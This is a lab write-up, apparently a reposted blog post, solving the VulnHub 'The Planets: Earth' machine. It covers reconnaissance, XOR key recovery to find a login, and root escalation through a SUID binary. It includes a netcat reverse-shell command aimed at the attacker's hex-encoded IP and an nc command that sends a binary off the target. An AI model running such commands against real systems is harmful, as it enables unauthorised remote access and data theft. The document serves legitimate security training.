[Lab Collection] vulnhub-THE PLANETS: EARTH

admin, February 16, 2024 00:38:51

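Disclaimer: Do not use the techniques in this article for illegal purposes; any such illegal conduct has nothing to do with the author of this article or this official account. Please comply with the Cybersecurity Law of the People's Republic of China.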

0X01 Preparation

Attacker IP: 192.168.1.108
Target IP: 192.168.1.109

0X02 Information gathering

nmap -A -p 0-65535 192.168.1.109 //scan ports

Add the DNS entries with vim.

Visiting https://earth.local/ reveals three strings.

dirsearch.py -u https://earth.local/ //scan directories
python3 dirsearch.py -u https://terratest.earth.local/

A /testingnotes.* file exists; brute-forcing the extension shows that it is a TXT file.

Visit https://terratest.earth.local/testingnotes.txt

    Testing secure messaging system notes:
    *Using XOR encryption as the algorithm, should be safe as used in RSA.
    *Earth has confirmed they have received our sent messages.
    *testdata.txt was used to test encryption.
    *terra used as username for admin portal.
    Todo:
    *How do we send our monthly keys to Earth securely? Or should we change keys weekly?
    *Need to test different key lengths to protect against bruteforce. How long should the key be?
    *Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.

The notes reveal a testdata.txt file and that the username is terra. The password has to be obtained by XORing the contents of testdata.txt with a string, which brings to mind the three strings found earlier.

A short script recovers a string:

    #!/usr/bin/python3
    import binascii

    # Contents of testdata.txt (the known plaintext)
    a = b"According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."
    # The three hex strings found on https://earth.local/
    b1 = "37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40"
    b2 = "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45"
    # Placeholder: the value of the third string is missing from this page
    b3 = "THIRD_HEX_STRING_FROM_EARTH_LOCAL"
    # Hex-encode the plaintext, XOR it with the third string as integers, decode the result
    c = binascii.b2a_hex(a)
    d = hex(int(c,16) ^ int(b3,16))
    print((binascii.a2b_hex(d[2:])))

Output:

    earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat

The output is earthclimatechangebad4humans repeating over and over. Try logging in with:

Username: terra
Password: earthclimatechangebad4humans
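An added example, not the author's script: a byte-wise version of the known-plaintext XOR step that also finds the key's repeat length automatically instead of reading it off the output, which is why a repeating XOR key gives no protection once any plaintext is known. The function names are illustrative, and the ciphertext is constructed here from the first sentence of testdata.txt and the key shown above, standing in for the third string from the page.

```python
#!/usr/bin/python3
# Added example (not the author's script): known-plaintext recovery of a
# repeating XOR key, done byte-wise instead of via big-integer XOR.
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with key, repeating the key as often as needed."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def smallest_period(stream: bytes) -> bytes:
    """Return the shortest prefix that, repeated, reproduces stream."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream  # only reached for an empty stream


def recover_key(known_plaintext: bytes, ciphertext_hex: str) -> bytes:
    """Recover the repeating key from a plaintext/ciphertext pair."""
    ciphertext = bytes.fromhex(ciphertext_hex)
    # zip() stops at the shorter input, so only the overlapping prefix
    # is compared when the two lengths differ.
    keystream = bytes(p ^ c for p, c in zip(known_plaintext, ciphertext))
    return smallest_period(keystream)


# Constructed sample: the first sentence of testdata.txt encrypted with the
# key reported in the write-up (stands in for the page's third string).
PLAINTEXT = (b"According to radiometric dating estimation and other evidence, "
             b"Earth formed over 4.5 billion years ago.")
KEY = b"earthclimatechangebad4humans"
SAMPLE_HEX = xor_bytes(PLAINTEXT, KEY).hex()

if __name__ == "__main__":
    print(recover_key(PLAINTEXT, SAMPLE_HEX).decode())
```

The known plaintext has to cover at least two repeats of the key for the period to be unambiguous; with less overlap the function returns the whole recovered keystream.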

0X03 Reverse shell

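Attempt a reverse shell. Testing shows that the IP address has to be converted to hexadecimal for the command to execute successfully.
Attacker: nc -lvvp 9191
Target: nc -e /bin/sh 0xc0.0xa8.0x01.0x6c 9191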

python -c 'import pty; pty.spawn("/bin/bash")' //spawn an interactive shell with python
find / -name "*flag*" //search for flag files

flag[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]

0X04 Privilege escalation

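find / -perm -4000 -ls 2> /dev/null //search for files with special permissions
The search turns up a privileged file, but running it does not succeed. Transfer the file out for analysis.
Attacker: nc -nlvp 9191 > /tmp/reset_root
Target: nc 192.168.1.108 9191 < /usr/bin/reset_root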

Analysis with the strace command shows that some files are missing; create them and try running it again.

touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe
It runs successfully and reports that the password has been reset to Earth.

Get the flag

flag[root_flag_b0da9554d29db2117b02aa8b66ec492e]

0X05

Originally published on the WeChat official account (皓月的笔记本): [Lab Collection] vulnhub-THE PLANETS: EARTH

  • When reposting, please keep the link to this article (CN-SEC中文网: thanks to the original author for the hard work): [Lab Collection] vulnhub-THE PLANETS: EARTH http://cn-sec.com/archives/2171555.html
